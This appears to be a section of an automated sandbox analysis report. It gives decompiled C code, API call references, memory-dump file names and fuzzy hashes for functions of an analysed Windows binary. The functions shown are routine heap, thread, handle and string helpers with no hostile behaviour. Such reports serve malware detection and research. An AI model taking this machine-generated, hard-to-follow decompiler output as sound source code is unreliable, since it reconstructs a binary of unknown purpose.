                                        • RtlAllocateHeap.KERNEL32(00000008,00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9AC
                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9B9
                                        • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9D0
                                        • RtlReAllocateHeap.KERNEL32(00000008,00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9DF
                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9EE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Value$AllocateHeap$Alloc
                                        • String ID:
                                        • API String ID: 2511646910-0
                                        • Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                                        • Instruction ID: 6aefa700dac003ca587b863f4edba1f8b981b596a5646b90c6d2dc64a5bf87be
                                        • Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                                        • Instruction Fuzzy Hash: 13118676645310AFD7109FA5EC44BA67FA9EB18760B05813EF904D7370DA359C44CBAC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412384, Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E00412384(void* _a4) {
				void* _t13;
				long _t19;
				void _t20;
				void* _t21;
				void* _t22;
				void* _t24;

				_t22 = _a4;
				 *0x4175c8( *((intOrPtr*)(_t22 + 0xc)));
				CloseHandle( *(_t22 + 0x10));
				 *0x41750c(0x4186e8);
				_t20 =  *_t22;
				_t13 =  *(_t22 + 4);
				if(_t20 == 0) {
					 *0x4186e4 = _t13;
				} else {
					 *(_t20 + 4) = _t13;
				}
				_t21 =  *(_t22 + 4);
				if(_t21 != 0) {
					 *_t21 =  *_t22;
				}
				 *0x417514(0x4186e8);
				_t19 =  *(_t22 + 8);
				while(_t19 != 0) {
					_t24 = _t19;
					_t19 =  *_t19;
					 *((intOrPtr*)(_t24 + 4))( *((intOrPtr*)(_t24 + 8)));
					HeapFree( *0x418068, 0, _t24);
				}
				return HeapFree( *0x418068, _t19, _t22);
			}









                                        0x00412387
                                        0x0041238e
                                        0x00412397
                                        0x004123a3
                                        0x004123a9
                                        0x004123ab
                                        0x004123b0
                                        0x004123b7
                                        0x004123b2
                                        0x004123b2
                                        0x004123b2
                                        0x004123bc
                                        0x004123c1
                                        0x004123c5
                                        0x004123c5
                                        0x004123c8
                                        0x004123ce
                                        0x004123ec
                                        0x004123d3
                                        0x004123d5
                                        0x004123da
                                        0x004123e6
                                        0x004123e6
                                        0x00412401

                                        APIs
                                        • UnregisterWait.KERNEL32(?), ref: 0041238E
                                        • CloseHandle.KERNEL32(?,?,?,?,0041250A,?), ref: 00412397
                                        • RtlEnterCriticalSection.KERNEL32(004186E8,?,?,?,0041250A,?), ref: 004123A3
                                        • RtlLeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041250A,?), ref: 004123C8
                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041250A,?), ref: 004123E6
                                        • HeapFree.KERNEL32(?,?,?,?,?,0041250A,?), ref: 004123F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                        • String ID:
                                        • API String ID: 4204870694-0
                                        • Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                                        • Instruction ID: f8c2ed9ce13198d0bbd0ef04303aa87640752f6362b71f4c8f546c925b915501
                                        • Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                                        • Instruction Fuzzy Hash: 6B014C71201605BFC7159F21ED889DABF79FF49351310843EE92AC2A20C735AC61CFA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004098EF, Relevance: 9.0, APIs: 6, Instructions: 31COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E004098EF(void** _a4) {
				void** _t19;

				_t19 = _a4;
				CloseHandle( *_t19);
				if(_t19[2] != 0) {
					CloseHandle(_t19[2]);
				}
				if(_t19[3] != 0) {
					CloseHandle(_t19[3]);
				}
				if(_t19[4] != 0) {
					CloseHandle(_t19[4]);
				}
				 *0x41750c(0x418730);
				E0040E152(0x418148, _t19);
				return  *0x417514(0x418730);
			}




                                        0x004098f0
                                        0x004098fd
                                        0x00409903
                                        0x00409908
                                        0x00409908
                                        0x0040990e
                                        0x00409913
                                        0x00409913
                                        0x00409919
                                        0x0040991e
                                        0x0040991e
                                        0x00409926
                                        0x00409932
                                        0x00409942

                                        APIs
                                        • CloseHandle.KERNEL32(022F97F8,?,?,00403DFC,?,00000000,00000000,00000000,00417026,?,00000000,00000000,00000000,00000044,00000000), ref: 004098FD
                                        • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,00417026,?,00000000,00000000,00000000,00000044,00000000), ref: 00409908
                                        • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,00417026,?,00000000,00000000,00000000,00000044,00000000), ref: 00409913
                                        • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,00417026,?,00000000,00000000,00000000,00000044,00000000), ref: 0040991E
                                        • RtlEnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,00417026,?,00000000,00000000,00000000,00000044,00000000), ref: 00409926
                                        • RtlLeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,00417026,?,00000000,00000000,00000000,00000044,00000000), ref: 0040993A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CloseHandle$CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 10009202-0
                                        • Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                                        • Instruction ID: 5e7e39790fc130eb44601190be84188015503c307ad02b60d96f95966566b220
                                        • Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                                        • Instruction Fuzzy Hash: 28F05E32004200EFC3226B15DC08BABB7B5FFC1355F15883EE059615B0CB786892DF59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004057F0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E004057F0(void* __ebx, void* __edi, void* __esi, wchar_t* _a4, intOrPtr _a8, wchar_t* _a12, intOrPtr _a16) {
				signed int _v4;
				void* __ecx;
				signed int _t25;
				signed int _t26;
				void* _t27;
				signed short _t33;
				wchar_t* _t35;
				signed short* _t37;
				signed int _t39;
				void* _t40;
				signed short* _t41;
				intOrPtr _t43;
				signed short* _t44;
				void* _t46;
				void* _t47;
				wchar_t* _t50;
				wchar_t* _t51;
				wchar_t* _t52;
				int _t54;
				void* _t59;

				_t43 = _a8;
				_t54 = 0;
				if(_t43 < 1) {
					return E0040E940(_t40, _a16);
				} else {
					_t50 = _a4;
					if(_t50 == 0) {
						_t50 = 0x413024;
					}
					_t41 = _a12;
					if(_t41 == 0) {
						_t41 = 0x413024;
						_a12 = 0x413024;
					}
					_t25 =  *_t41 & 0x0000ffff;
					_t46 = 0;
					_v4 = _t25;
					_t35 = _t50;
					_a4 = _t35;
					if(_t25 == 0 || _t41[1] == 0) {
						_t41 = _v4;
						while(1) {
							_t26 =  *_t50 & 0x0000ffff;
							if(_t26 == _t41 || _t26 == 0) {
								goto L20;
							}
							L23:
							_t50 =  &(_t50[0]);
							continue;
							L20:
							_t46 = _t46 + 1;
							if(_t46 == _t43) {
								_t54 = _t50 - _t35 >> 1;
							} else {
								if(_t26 != 0) {
									_t17 =  &(_t50[0]); // 0x0
									_t35 = _t17;
									goto L23;
								}
							}
							goto L26;
						}
					} else {
						_t37 = _t41;
						_t8 =  &(_t37[1]); // 0x413026
						_t44 = _t8;
						do {
							_t33 =  *_t37;
							_t37 =  &(_t37[1]);
						} while (_t33 != 0);
						_t39 = _t37 - _t44 >> 1;
						while(1) {
							L10:
							_push(_t39);
							_push(_t41);
							_push(_t50);
							L004052F5();
							_t59 = _t59 + 0xc;
							if(_t33 != 0 &&  *_t50 != _t54) {
								break;
							}
							_t46 = _t46 + 1;
							if(_t46 == _a8) {
								_t35 = _a4;
								_t54 = _t50 - _t35 >> 1;
							} else {
								if( *_t50 == _t54) {
									_t35 = _a4;
								} else {
									_t41 = _a12;
									_t50 = _t50 + _t39 * 2;
									_a4 = _t50;
									continue;
								}
							}
							goto L26;
						}
						_t41 = _a12;
						_t50 =  &(_t50[0]);
						goto L10;
					}
					L26:
					_t27 = E0040E820(_t41, _t50);
					_t51 = _a12;
					_t47 = _t27;
					if(_t47 != 0) {
						memmove(E0040E870(_t41, _t51), _t35, _t54 * 2);
						_t59 = _t59 + 0xc;
					}
					_t52 = E0040E8A0(_t54, _t51);
					if(_t47 == 0) {
						wcsncpy(_t52, _t35, _t54);
					}
					 *((short*)(_t52 + _t54 * 2)) = 0;
					return 0;
				}
			}























                                        0x004057f1
                                        0x004057f6
                                        0x004057fb
                                        0x0040591a
                                        0x00405801
                                        0x00405803
                                        0x0040580a
                                        0x0040580c
                                        0x0040580c
                                        0x00405811
                                        0x00405817
                                        0x00405819
                                        0x0040581e
                                        0x0040581e
                                        0x00405822
                                        0x00405825
                                        0x00405827
                                        0x0040582b
                                        0x0040582d
                                        0x00405834
                                        0x00405892
                                        0x00405896
                                        0x00405896
                                        0x0040589c
                                        0x00000000
                                        0x00000000
                                        0x004058b0
                                        0x004058b0
                                        0x00000000
                                        0x004058a3
                                        0x004058a3
                                        0x004058a6
                                        0x004058b9
                                        0x004058a8
                                        0x004058ab
                                        0x004058ad
                                        0x004058ad
                                        0x00000000
                                        0x004058ad
                                        0x004058ab
                                        0x00000000
                                        0x004058a6
                                        0x0040583c
                                        0x0040583c
                                        0x0040583e
                                        0x0040583e
                                        0x00405841
                                        0x00405841
                                        0x00405844
                                        0x00405847
                                        0x0040584e
                                        0x00405850
                                        0x00405850
                                        0x00405850
                                        0x00405851
                                        0x00405852
                                        0x00405853
                                        0x00405858
                                        0x0040585d
                                        0x00000000
                                        0x00000000
                                        0x0040586d
                                        0x00405872
                                        0x00405886
                                        0x0040588e
                                        0x00405874
                                        0x00405877
                                        0x004058bd
                                        0x00405879
                                        0x00405879
                                        0x0040587d
                                        0x00405880
                                        0x00000000
                                        0x00405880
                                        0x00405877
                                        0x00000000
                                        0x00405872
                                        0x00405864
                                        0x00405868
                                        0x00000000
                                        0x00405868
                                        0x004058c1
                                        0x004058c2
                                        0x004058c7
                                        0x004058cb
                                        0x004058cf
                                        0x004058e1
                                        0x004058e6
                                        0x004058e6
                                        0x004058f0
                                        0x004058f4
                                        0x004058f9
                                        0x004058fe
                                        0x00405904
                                        0x0040590c
                                        0x0040590c

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: _wcsncollmemmovewcsncpy
                                        • String ID: $0A$$0A
                                        • API String ID: 2558734708-167650565
                                        • Opcode ID: 14d35230a42a4cc77db22f05e6cdcf4f89bfeca667fb4c743adc963e1acc60c2
                                        • Instruction ID: ea6710757c84450a7ad15180977ddc2d9a5de118109fb65f978c95c37aba6350
                                        • Opcode Fuzzy Hash: 14d35230a42a4cc77db22f05e6cdcf4f89bfeca667fb4c743adc963e1acc60c2
                                        • Instruction Fuzzy Hash: 9331C337904B058BC720BB55888057B77A8EE84344B14893EEC8537382EB799D61DBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A663, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 83%
                                        			E0040A663(void** _a4, wchar_t* _a8, intOrPtr _a12) {
				signed int _t35;
				wchar_t* _t41;
				wchar_t* _t50;
				void* _t57;
				void** _t58;
				signed int _t59;

				_t50 = _a8;
				_t58 = _a4;
				if(_a12 != 1) {
					L4:
					if(_t50 == 0) {
						_t50 = 0x413024;
					}
					_push(_t50);
					if((_t58[0xb] & 0x00000001) == 0) {
						_t35 = E0040A8CF();
					} else {
						_t35 = E0040A8EA();
					}
					_t59 = _t35 % _t58[9];
					_t57 = E0040DB9F(_t58[0xe]);
					if(_t57 == 0) {
						L14:
						return _t57;
					} else {
						_t41 = RtlAllocateHeap( *0x418068, 0, 2 + wcslen(_t50) * 2);
						 *(_t57 + 4) = _t41;
						wcscpy(_t41, _t50);
						 *_t57 =  *(_t58[1] + _t59 * 4);
						 *(_t58[1] + _t59 * 4) = _t57;
						_t58[2] = _t58[2] & 0x00000000;
						_t58[0xa] = _t58[0xa] + 1;
						 *_t58 = _t57;
						_t57 = _t57 + 8;
						_t58[5] = _t59;
						L11:
						if(_t57 != 0) {
							memset(_t57, 0, _t58[7]);
							if((_t58[0xb] & 0x00000002) != 0) {
								E0041220F(_t57, _t58[4]);
							}
						}
						goto L14;
					}
				}
				_t57 = E0040A5D8(_t58, _t50);
				if(_t57 == 0) {
					goto L4;
				}
				if(_t58[4] != 0) {
					E0041210A(_t48, _t57, _t58[4]);
				}
				goto L11;
			}









                                        0x0040a669
                                        0x0040a66f
                                        0x0040a674
                                        0x0040a698
                                        0x0040a69a
                                        0x0040a69c
                                        0x0040a69c
                                        0x0040a6a5
                                        0x0040a6a6
                                        0x0040a6af
                                        0x0040a6a8
                                        0x0040a6a8
                                        0x0040a6a8
                                        0x0040a6bd
                                        0x0040a6c4
                                        0x0040a6c8
                                        0x0040a731
                                        0x0040a737
                                        0x0040a6ca
                                        0x0040a6e1
                                        0x0040a6e9
                                        0x0040a6ec
                                        0x0040a6f9
                                        0x0040a6fe
                                        0x0040a701
                                        0x0040a705
                                        0x0040a708
                                        0x0040a70a
                                        0x0040a70d
                                        0x0040a710
                                        0x0040a712
                                        0x0040a71a
                                        0x0040a726
                                        0x0040a72c
                                        0x0040a72c
                                        0x0040a726
                                        0x00000000
                                        0x0040a712
                                        0x0040a6c8
                                        0x0040a67d
                                        0x0040a681
                                        0x00000000
                                        0x00000000
                                        0x0040a687
                                        0x0040a691
                                        0x0040a691
                                        0x00000000

                                        APIs
                                        • wcslen.MSVCRT ref: 0040A6CB
                                        • RtlAllocateHeap.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A4EC,?,?,00000000,?,?,00403C0E), ref: 0040A6E1
                                        • wcscpy.MSVCRT ref: 0040A6EC
                                        • memset.MSVCRT ref: 0040A71A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateHeapmemsetwcscpywcslen
                                        • String ID: $0A
                                        • API String ID: 2037025450-513306843
                                        • Opcode ID: 8728b23922fe7a93b49c2ce737508fa52b87546bd90cd121456506f441a99fc6
                                        • Instruction ID: d2349854ff5f7846fcad9212d4fd70eef051232b656cfd2016721c3efeb3c4ee
                                        • Opcode Fuzzy Hash: 8728b23922fe7a93b49c2ce737508fa52b87546bd90cd121456506f441a99fc6
                                        • Instruction Fuzzy Hash: 8821F732100B00AFC721AF159885B2BB7F9EF88314F14893FF58563691CB79E8258F1A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A400, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E0040A400(void* _a8, void** _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _t25;
				void* _t31;
				void* _t34;
				signed int _t36;
				intOrPtr _t38;
				long _t39;
				void** _t41;
				void* _t42;

				_t41 = _a16;
				E0040A4EF( *_t41);
				_t34 = RtlAllocateHeap( *0x418068, 0, 0x3c);
				if(_t34 != 0) {
					_t36 =  *(_t42 + 0x24);
					if(_t36 <= 0) {
						_t36 = 1;
					}
					_t25 = RtlAllocateHeap( *0x418068, 8, _t36 << 2);
					 *(_t34 + 4) = _t25;
					if(_t25 == 0) {
						HeapFree( *0x418068, 0, _t34);
						_t34 = 0;
					} else {
						 *((intOrPtr*)(_t34 + 0x20)) = _v8;
						 *(_t34 + 0x24) = _t36;
						_t38 = _v12;
						 *_t34 = 0;
						 *((intOrPtr*)(_t34 + 0x1c)) = _t38;
						 *((intOrPtr*)(_t34 + 0x10)) =  *((intOrPtr*)(_t42 + 0x1c));
						 *((intOrPtr*)(_t34 + 0x28)) = 0;
						 *(_t34 + 0x2c) = 0;
						 *(_t34 + 0x30) = _t41;
						 *((intOrPtr*)(_t34 + 0x34)) = 0;
						if(E00411DE4( *((intOrPtr*)(_t42 + 0x1c))) != 0) {
							 *(_t34 + 0x2c) =  *(_t34 + 0x2c) | 0x00000002;
						}
						_push(4);
						_push(0x10000);
						_t39 = _t38 + 8;
						 *((intOrPtr*)(_t34 + 0x38)) = E0040DE39(_t39, 0x10);
						_t31 = RtlAllocateHeap( *0x418068, 8, _t39);
						 *(_t34 + 0xc) = _t31;
						 *((intOrPtr*)(_t31 + 4)) = 0x413024;
						 *_t41 = _t34;
					}
				}
				return _t34;
			}














                                        0x0040a402
                                        0x0040a40a
                                        0x0040a421
                                        0x0040a425
                                        0x0040a42c
                                        0x0040a432
                                        0x0040a436
                                        0x0040a436
                                        0x0040a445
                                        0x0040a447
                                        0x0040a44c
                                        0x0040a4bc
                                        0x0040a4c2
                                        0x0040a44e
                                        0x0040a454
                                        0x0040a45b
                                        0x0040a45e
                                        0x0040a463
                                        0x0040a465
                                        0x0040a468
                                        0x0040a46b
                                        0x0040a46e
                                        0x0040a471
                                        0x0040a474
                                        0x0040a47e
                                        0x0040a480
                                        0x0040a480
                                        0x0040a484
                                        0x0040a486
                                        0x0040a48d
                                        0x0040a499
                                        0x0040a4a2
                                        0x0040a4a4
                                        0x0040a4a7
                                        0x0040a4ae
                                        0x0040a4ae
                                        0x0040a4c4
                                        0x0040a4ca

                                        APIs
                                          • Part of subcall function 0040A4EF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A51A
                                          • Part of subcall function 0040A4EF: HeapFree.KERNEL32(00000000,?,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A526
                                          • Part of subcall function 0040A4EF: HeapFree.KERNEL32(00000000,?,?,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A53A
                                          • Part of subcall function 0040A4EF: HeapFree.KERNEL32(00000000,00000000,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A550
                                        • RtlAllocateHeap.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A41F
                                        • RtlAllocateHeap.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A445
                                        • RtlAllocateHeap.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A4A2
                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Heap$Free$Allocate
                                        • String ID: $0A
                                        • API String ID: 3472947110-513306843
                                        • Opcode ID: 74d57ebc58ea5ed94cd1ec6984815053bda27b5c43fd22109b2fa25d69ddb019
                                        • Instruction ID: 12eb874fce7a6d86095f80bea981c62bed4fc2fe7fcb1d78d923a6b2b4105749
                                        • Opcode Fuzzy Hash: 74d57ebc58ea5ed94cd1ec6984815053bda27b5c43fd22109b2fa25d69ddb019
                                        • Instruction Fuzzy Hash: 25216DB1600716AFD3108F1ADD05B46BBE4FB48700F41812AF50CE7691D7B0E864CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040552C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E0040552C(void* _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t5;
				signed int _t6;
				void* _t10;

				_t10 = _a4;
				memset(_t10, 0, 0x11c);
				 *_t10 = 0x11c;
				_t3 = GetModuleHandleW(L"ntdll.dll");
				if(_t3 == 0) {
					L3:
					return 0;
				}
				_t5 = GetProcAddress(_t3, "RtlGetVersion");
				if(_t5 == 0) {
					goto L3;
				}
				_t6 =  *_t5(_t10);
				asm("sbb eax, eax");
				return  ~_t6 + 1;
			}







                                        0x0040552d
                                        0x0040553b
                                        0x00405543
                                        0x0040554a
                                        0x00405552
                                        0x0040556e
                                        0x00000000
                                        0x0040556e
                                        0x0040555a
                                        0x00405562
                                        0x00000000
                                        0x00000000
                                        0x00405565
                                        0x00405569
                                        0x00000000

                                        APIs
                                        • memset.MSVCRT ref: 0040553B
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AddressHandleModuleProcmemset
                                        • String ID: RtlGetVersion$ntdll.dll
                                        • API String ID: 3137504439-1489217083
                                        • Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                                        • Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
                                        • Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                                        • Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040548C, Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E0040548C(void* __ebx, _Unknown_base(*)()* _a4, void* _a8) {
				long _v4;
				long _t10;
				intOrPtr* _t12;
				void** _t18;
				void* _t24;
				intOrPtr* _t25;
				long _t27;
				void* _t28;

				_t27 = 0;
				_t28 = CreateThread(0, 0x1000, _a4, _a8, 0,  &_v4);
				if(_t28 != 0) {
					 *0x41750c(0x418708, _t24);
					_t25 =  *0x41811c; // 0x0
					if(_t25 != 0) {
						do {
							_t4 = _t25 + 8; // 0x8
							_t18 = _t4;
							if(WaitForSingleObject( *_t18, _t27) != 0) {
								_t25 =  *_t25;
							} else {
								CloseHandle( *_t18);
								_t25 =  *_t25;
								E0040E152(0x41811c, _t18);
							}
						} while (_t25 != 0);
					}
					_t10 =  *0x417104; // 0x1
					_t27 = _t10;
					 *0x417104 = _t10 + 1;
					_t12 = E0040E192(0x41811c);
					 *_t12 = _t28;
					 *(_t12 + 4) = _t27;
					 *0x417514(0x418708, 0x10);
				}
				return _t27;
			}











                                        0x00405493
                                        0x004054ab
                                        0x004054af
                                        0x004054b7
                                        0x004054bd
                                        0x004054c5
                                        0x004054c8
                                        0x004054c9
                                        0x004054c9
                                        0x004054d6
                                        0x004054f1
                                        0x004054d8
                                        0x004054da
                                        0x004054e0
                                        0x004054e8
                                        0x004054ee
                                        0x004054f3
                                        0x004054f7
                                        0x004054f8
                                        0x004054fd
                                        0x00405507
                                        0x0040550c
                                        0x00405518
                                        0x0040551a
                                        0x0040551d
                                        0x00405523
                                        0x00405529

                                        APIs
                                        • CreateThread.KERNEL32 ref: 004054A5
                                        • RtlEnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                                        • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                                        • CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                                          • Part of subcall function 0040E152: HeapFree.KERNEL32(00000000,-00000008,0040DA6B,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E18B
                                        • RtlLeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3708593966-0
                                        • Opcode ID: 57e4544e620dfdff16d35c1b8385623b9670560eb717dfbfca16eb2407ae9eea
